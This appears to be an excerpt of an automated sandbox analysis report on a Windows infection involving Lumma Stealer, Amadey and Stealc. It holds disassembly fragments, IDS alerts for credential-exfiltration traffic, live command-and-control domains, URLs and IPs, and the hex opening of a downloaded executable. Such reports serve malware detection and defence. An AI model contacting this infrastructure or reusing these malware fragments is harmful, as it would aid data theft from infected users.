Source:	Binary string: BitLockerToGo.pdb source: dd662b5386.exe, 0000000E.00000002.2623904415.000000000E388000.00000004.00001000.00020000.00000000.sdmp, dbe8776a6a.exe, 0000000F.00000002.2728858042.000000000E000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\users\source\repos\Brought\Brought\obj\Release\Brought.pdb source: 9f19f13091.exe, 00000004.00000002.2280248529.0000000003529000.00000004.00000800.00020000.00000000.sdmp, 9f19f13091.exe, 00000004.00000000.2228824211.0000000000032000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: dd662b5386.exe, 0000000E.00000002.2623904415.000000000E388000.00000004.00001000.00020000.00000000.sdmp, dbe8776a6a.exe, 0000000F.00000002.2728858042.000000000E000000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: number of queries: 1001
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: number of queries: 1001

Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_009EEF71 FindFirstFileExW,	0_2_009EEF71
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 1_2_00B6EF71 FindFirstFileExW,	1_2_00B6EF71
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 2_2_00B6EF71 FindFirstFileExW,	2_2_00B6EF71

Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	6_2_004469B0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov dword ptr [esp+08h], edi	6_2_00433ADD
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], esi	6_2_00446AE0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-000000BBh]	6_2_00447A90
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then lea ecx, dword ptr [eax+eax]	6_2_00444C00
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov word ptr [ecx], dx	6_2_00447CB0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+078CCBDEh]	6_2_004475C0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+esi+0Ch]	6_2_0043F640
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov ecx, eax	6_2_0043F640
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx ecx, byte ptr [ebx+eax-7Dh]	6_2_00411605
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], CA198B66h	6_2_0042BF10
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+esi]	6_2_00446040
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then push dword ptr [esi+14h]	6_2_0041083A
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov ecx, eax	6_2_0041083A
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx esi, byte ptr [ebx+ecx-000000D2h]	6_2_0042F8C9
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov ecx, eax	6_2_004298F0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+02h]	6_2_0044108A
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	6_2_004400A0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx edx, byte ptr [eax]	6_2_004400A0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 720EEED4h	6_2_00443100
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-2809052Bh]	6_2_00443100
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx edx, byte ptr [esp+esi+27577599h]	6_2_00443100
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov byte ptr [eax], cl	6_2_0041D12C
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	6_2_0041D12C
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	6_2_0040A1A0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	6_2_0040A1A0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov word ptr [eax], cx	6_2_004201AB
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+140AC537h]	6_2_00445A52
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov eax, ebx	6_2_00421260
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov byte ptr [eax], cl	6_2_0041C221
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	6_2_0041C221
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+38h]	6_2_0042D23F
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov ecx, eax	6_2_004232C0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	6_2_0043CAD0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov ecx, eax	6_2_0042C2E0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+578BD47Eh]	6_2_0040FAFA
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+02h]	6_2_00440A80
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+02h]	6_2_00440A80
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov ecx, eax	6_2_0040EB00
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]	6_2_00426380
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 656D2358h	6_2_0041ABA1
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov ecx, eax	6_2_0041ABA1
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov ecx, eax	6_2_00429BA0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-72CBAB97h]	6_2_0041FBB0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov edx, ecx	6_2_0042C3BD
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov ecx, eax	6_2_0042C3BD
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov ebx, ecx	6_2_00444C40
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then lea ecx, dword ptr [eax+eax]	6_2_00444C40
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then push esi	6_2_00425453
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov word ptr [esi], cx	6_2_00424C60
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov byte ptr [ecx], bl	6_2_0043347A
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov eax, edx	6_2_00423400
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov ecx, eax	6_2_00429D50
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx esi, byte ptr [edx]	6_2_00445553
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-2809055Fh]	6_2_00411D78
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then jmp dword ptr [0044EA9Ch]	6_2_0042E534
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then lea ecx, dword ptr [eax+27h]	6_2_0041DD90
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	6_2_0041DD90
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then lea ecx, dword ptr [eax+27h]	6_2_0041DD90
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx esi, byte ptr [edx]	6_2_004025A0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov ecx, eax	6_2_00411E6A
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax+27DDFCF1h]	6_2_0042BE06
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	6_2_00418E80
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+06h]	6_2_004206A0
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+20h]	6_2_0041A757
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	6_2_00402770
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	6_2_0042FF10
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+eax-000000ECh]	6_2_0042B7C8
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov byte ptr [edi], al	6_2_00433FCE
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+00000170h]	6_2_00433FCE
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx ebx, byte ptr [edi+ecx-70AAEE47h]	6_2_00411FF7
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then mov byte ptr [edi], al	6_2_00433FCC
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+00000170h]	6_2_00433FCC

Source: firefox.exe

Memory has grown: Private usage: 1MB later: 188MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.6:49736 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49712 -> 176.113.115.6:80
Source: Network traffic	Suricata IDS: 2060385 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (exarthynature .run) : 192.168.2.6:49615 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.6:49743 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.6:49750 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.6:49761 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.6:49757 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2060206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dsfljsdfjewf .info) : 192.168.2.6:52752 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060330 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deaddereaste .today) : 192.168.2.6:53728 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060202 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (decreaserid .world) : 192.168.2.6:57049 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060307 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (privileggoe .live) : 192.168.2.6:56729 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060313 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (subawhipnator .life) : 192.168.2.6:54737 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060338 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pastedeputten .life) : 192.168.2.6:61672 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060315 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (uncertainyelemz .bet) : 192.168.2.6:61055 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060334 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hobbyedsmoker .live) : 192.168.2.6:49910 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50033 -> 45.93.20.28:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50056 -> 45.93.20.28:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:50078 -> 176.113.115.6:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50135 -> 45.93.20.28:80
Source: Network traffic	Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.6:50186 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.6:50189 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.6:50188 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.6:50192 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2060206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dsfljsdfjewf .info) : 192.168.2.6:55188 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060202 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (decreaserid .world) : 192.168.2.6:56534 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060334 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hobbyedsmoker .live) : 192.168.2.6:54411 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060307 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (privileggoe .live) : 192.168.2.6:55986 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060315 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (uncertainyelemz .bet) : 192.168.2.6:65259 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060338 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pastedeputten .life) : 192.168.2.6:53906 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060313 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (subawhipnator .life) : 192.168.2.6:63580 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060330 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deaddereaste .today) : 192.168.2.6:54174 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.6:50191 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49736 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49736 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49761 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49757 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49743 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49817 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49830 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49812 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49812 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49852 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49852 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49899 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49859 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49912 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49999 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50036 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50036 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50039 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50037 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50026 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50052 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50066 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50125 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50133 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50188 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50191 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50132 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50186 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50186 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50192 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50227 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50227 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50225 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50122 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50228 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50252 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50121 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50121 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50024 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50024 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50257 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50224 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50258 -> 172.67.200.156:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50249 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50250 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50223 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50223 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://45.93.20.28/85a1cacf11314eb8.php
Source: Malware configuration extractor	URLs: exarthynature.run
Source: Malware configuration extractor	URLs: uncertainyelemz.bet
Source: Malware configuration extractor	URLs: hobbyedsmoker.live
Source: Malware configuration extractor	URLs: presentymusse.world
Source: Malware configuration extractor	URLs: deaddereaste.today
Source: Malware configuration extractor	URLs: subawhipnator.life
Source: Malware configuration extractor	URLs: privileggoe.live
Source: Malware configuration extractor	URLs: boltetuurked.digital
Source: Malware configuration extractor	IPs: 176.113.115.6
Source: Malware configuration extractor	IPs: 185.156.73.73
Source: Malware configuration extractor	IPs: 45.91.200.135

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:26:30 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 25 Feb 2025 19:05:24 GMTETag: "54e00-62efc23970500"Accept-Ranges: bytesContent-Length: 347648Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 7b 22 8c e5 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 1e 00 00 00 08 00 00 00 00 00 00 76 36 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 05 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 36 00 00 4f 00 00 00 00 40 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 0c 00 00 00 90 35 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 1c 00 00 00 20 00 00 00 1e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9c 05 00 00 00 40 00 00 00 06 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 00 00 00 02 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 63 73 73 00 00 00 00 00 24 05 00 00 80 00 00 00 24 05 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 